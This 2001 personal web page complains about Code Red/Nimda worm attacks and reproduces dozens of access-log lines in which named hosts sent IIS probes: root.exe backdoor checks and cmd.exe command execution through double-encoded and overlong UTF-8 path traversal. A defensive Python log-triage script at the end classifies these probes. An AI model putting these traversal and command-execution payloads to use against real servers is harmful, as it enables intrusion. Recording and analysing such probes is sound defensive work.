Site under virus hack attack: Code Red Nimda at SALIU.COM!

This Site Is Under Hack Attack: Code Red/ Nimda Virus

Acts Of Hostility Against SALIU.COM

Written by Ion Saliu on November 11, 2001.

• My website has been under a serious attack in the past weeks. It appears to be a Nimda / Code Red virus attack. I complained to some of the respective ISPs where the attacks originated. Some responded; others haven't. I make the addresses public, so that other Internet users are aware of such despicable acts. The number of attacks last week: 271. If you know some of the end-users of the attacks, don't hesitate to express your opinions. Some of the attacks are extremely vicious: several times a day, every day, every week. This is the case for the address:
mil-static-ws-24.dsl.airstreamcomm.net
(from Milltown, Australia)

What the bastards are doing is not freedom of speech. It is CRIME. Law enforcement all over the world treats such acts as crimes. Such acts are punished as crimes. Their perpetrators are treated as criminals.
The source of those crimes is HATRED. Forget about freedom of speech. The acts are the result of lowly hatred. And the goal is to silence another human. What a futile purpose! If it wasn't me this time, there will be other persons with similar ideas and actions such as mine. Humans do not create ideas. Humans only come across ideas. For the ideas have always been out there. They express relations, and laws, and formulae of the eternal Number. Humans will come across such relations at various points in time. Always! In spite of all mental viruses in the world!

(Toronto, Canada)
hse-toronto-ppp284894.sympatico.ca - - [07/Nov/2001:18:16:21 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
hse-toronto-ppp284894.sympatico.ca - - [07/Nov/2001:18:16:30 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
hse-toronto-ppp284894.sympatico.ca - - [07/Nov/2001:18:16:39 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
hse-toronto-ppp284894.sympatico.ca - - [07/Nov/2001:18:16:48 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
hse-toronto-ppp284894.sympatico.ca - - [07/Nov/2001:18:16:57 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
hse-toronto-ppp284894.sympatico.ca - - [07/Nov/2001:18:17:06 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
hse-toronto-ppp284894.sympatico.ca - - [07/Nov/2001:18:17:15 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
hse-toronto-ppp284894.sympatico.ca - - [07/Nov/2001:18:17:24 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
hse-toronto-ppp284894.sympatico.ca - - [07/Nov/2001:18:17:33 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
hse-toronto-ppp284894.sympatico.ca - - [07/Nov/2001:18:17:42 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
hse-toronto-ppp284894.sympatico.ca - - [07/Nov/2001:18:17:51 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
hse-toronto-ppp284894.sympatico.ca - - [07/Nov/2001:18:18:00 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"

64.150.128.150 - - [04/Nov/2001:04:19:08 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:08 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:09 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:09 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:09 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:10 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:10 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:11 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:11 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:11 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:12 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:15 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:16 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:16 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:16 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.150.128.150 - - [04/Nov/2001:04:19:17 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"

dsl081-157-211.chi1.dsl.speakeasy.net - - [05/Nov/2001:02:05:08 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

dsl-6414820487.internetconnect.net - - [05/Nov/2001:18:50:27 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
dsl-6414820487.internetconnect.net - - [05/Nov/2001:18:50:27 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

Block 64.221.119.238 assigned to:
Concentric Network Corporation (NETBLK-CNCX-BLK-6)
1400 Parkmoor Avenue
San Jose, CA 95126-3429
64.221.119.238 - - [05/Nov/2001:20:46:23 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.221.119.238 - - [05/Nov/2001:20:46:23 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

dsl-64-130-20-225.telocity.com - - [06/Nov/2001:07:01:15 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
dsl-64-130-20-225.telocity.com - - [06/Nov/2001:07:01:15 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

mail.royalglassco.com - - [06/Nov/2001:07:04:31 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
dnai-216-15-72-109.cust.dnai.com - - [06/Nov/2001:07:04:31 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
dnai-216-15-72-109.cust.dnai.com - - [06/Nov/2001:07:04:31 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
dnai-216-15-72-109.cust.dnai.com - - [06/Nov/2001:07:04:31 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mail.royalglassco.com - - [06/Nov/2001:07:04:32 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

64-214-146-187.roc.frontiernet.net - - [06/Nov/2001:19:01:52 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64-214-146-187.roc.frontiernet.net - - [06/Nov/2001:19:01:53 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

Concentric Network Corporation (NETBLK-CNCX-BLK-6)
1400 Parkmoor Avenue
San Jose, CA 95126-3429
64.221.49.143 - - [06/Nov/2001:19:34:40 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.221.49.143 - - [06/Nov/2001:19:34:40 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

unknown.level3.net - - [06/Nov/2001:20:01:53 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
unknown.level3.net - - [06/Nov/2001:20:01:53 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

cust.64-52-88.194.ip.lax.ebrb.net - - [06/Nov/2001:21:42:54 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
cust.64-52-88.194.ip.lax.ebrb.net - - [06/Nov/2001:21:43:03 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

w214.z064001128.chi-il.dsl.cnc.net - - [06/Nov/2001:22:21:25 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
w214.z064001128.chi-il.dsl.cnc.net - - [06/Nov/2001:22:21:26 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

Pac Bell Internet Services (NETBLK-PBI-NET-8) PBI-NET-8
Main Way (NETBLK-SBCIS-101424-17188) SBCIS-101424-17188
64.174.183.150 - - [07/Nov/2001:00:26:21 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.174.183.150 - - [07/Nov/2001:00:26:21 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

64.164.28.169 - - [08/Nov/2001:05:07:10 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.164.28.169 - - [08/Nov/2001:05:07:10 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

mil-static-ws-24.dsl.airstreamcomm.net - - [09/Nov/2001:19:30:36 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [09/Nov/2001:19:30:42 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

Concentric Network Corporation (NETBLK-CNCX-BLK-6)
1400 Parkmoor Avenue
San Jose, CA 95126-3429
64.221.31.74 - - [09/Nov/2001:19:35:01 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.221.31.74 - - [09/Nov/2001:19:35:01 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

64.83.37.200.dsl200-static-nova.cavtel.net - - [10/Nov/2001:10:05:48 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
64.83.37.200.dsl200-static-nova.cavtel.net - - [10/Nov/2001:10:05:48 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

adsl-66-121-56-74.dsl.lsan03.pacbell.net - - [10/Nov/2001:22:24:18 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
adsl-66-121-56-74.dsl.lsan03.pacbell.net - - [10/Nov/2001:22:24:19 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

alhu9ewy171e.bc.hsia.telus.net - - [11/Nov/2001:07:21:54 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
alhu9ewy171e.bc.hsia.telus.net - - [11/Nov/2001:07:21:54 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:37 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:38 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:39 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:40 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:41 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:42 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:43 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:44 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:45 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:46 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:47 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:48 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:49 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
mil-static-ws-24.dsl.airstreamcomm.net - - [11/Nov/2001:08:22:50 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
...

(Rice Lake, Wisconsin, USA)
ricelakeonline.com - - [12/Nov/2001:13:08:53 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
ricelakeonline.com - - [12/Nov/2001:13:08:53 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
ricelakeonline.com - - [12/Nov/2001:13:08:54 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

user-64-112-182-10.noc.uswo.net - - [13/Nov/2001:03:54:39 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
user-64-112-182-10.noc.uswo.net - - [13/Nov/2001:03:54:40 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
user-64-112-182-10.noc.uswo.net - - [13/Nov/2001:03:54:40 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
user-64-112-182-10.noc.uswo.net - - [13/Nov/2001:03:54:40 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"
...

They started to run from one domain to another.
“You can run, but you can't hide!”

Ion Saliu
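
Triage of log entries like the ones above comes down to two questions: which probe family each request belongs to, and whether any probe was answered with a 2xx status instead of the 404/400 responses recorded here. The Python below is an added example, not part of the original page; the hostnames and log lines in SAMPLE are constructed placeholders in the same log format, and the category names are this example's own labels.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# One access-log entry; finditer-style matching also copes with two entries fused on one line.
ENTRY = re.compile(r'(\S+) - - \[([^\]]+)\] "GET (\S+) HTTP/1\.[01]" (\d{3}) \d+')
OVERLONG = re.compile(r'%c[01]%[0-9a-f]{2}', re.I)   # e.g. %c0%af, %c1%1c
STILL_ENCODED = re.compile(r'%(5c|2f)', re.I)        # separator still encoded after one decode

def classify(target):
    """Return a probe label for a request target, or None if it is not one of these probes."""
    path = target.split('?', 1)[0]
    low = path.lower()
    if low.endswith('/root.exe'):
        return 'root.exe backdoor probe'
    if not low.endswith('/cmd.exe'):
        return None
    if OVERLONG.search(path):
        return 'overlong UTF-8 traversal'
    if STILL_ENCODED.search(unquote(path)):   # %255c, %25%35%63, %%35c all decode to %5c
        return 'double-encoded traversal'
    return 'cmd.exe via mapped drive'

def summarize(log_text):
    """Group probes by source host and record any probe the server answered with 2xx."""
    hosts = defaultdict(lambda: {'probes': Counter(), 'served': []})
    for host, _ts, target, status in ENTRY.findall(log_text):
        kind = classify(target)
        if kind is None:
            continue
        hosts[host]['probes'][kind] += 1
        if status.startswith('2'):            # a 2xx here means the probe found something
            hosts[host]['served'].append(target)
    return dict(hosts)

# Constructed sample (placeholder hosts); the third line is deliberately two fused entries.
SAMPLE = (
    'scanner-a.example - - [07/Nov/2001:18:16:21 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"\n'
    'scanner-a.example - - [07/Nov/2001:18:16:39 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"\n'
    'scanner-a.example - - [07/Nov/2001:18:16:57 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-" '
    'scanner-a.example - - [07/Nov/2001:18:17:51 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 2562 "-" "-"\n'
    'scanner-a.example - - [07/Nov/2001:18:18:09 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"\n'
    'reader.example - - [07/Nov/2001:18:20:00 -0600] "GET /index.html HTTP/1.0" 200 5120 "-" "-"\n'
    'scanner-b.example - - [07/Nov/2001:19:00:00 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 1024 "-" "-"\n'
)

if __name__ == '__main__':
    for host, info in summarize(SAMPLE).items():
        print(host, dict(info['probes']), 'SERVED:', info['served'])
```

An empty `served` list for every host matches what the page's logs show: each probe was refused with 404 or 400.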
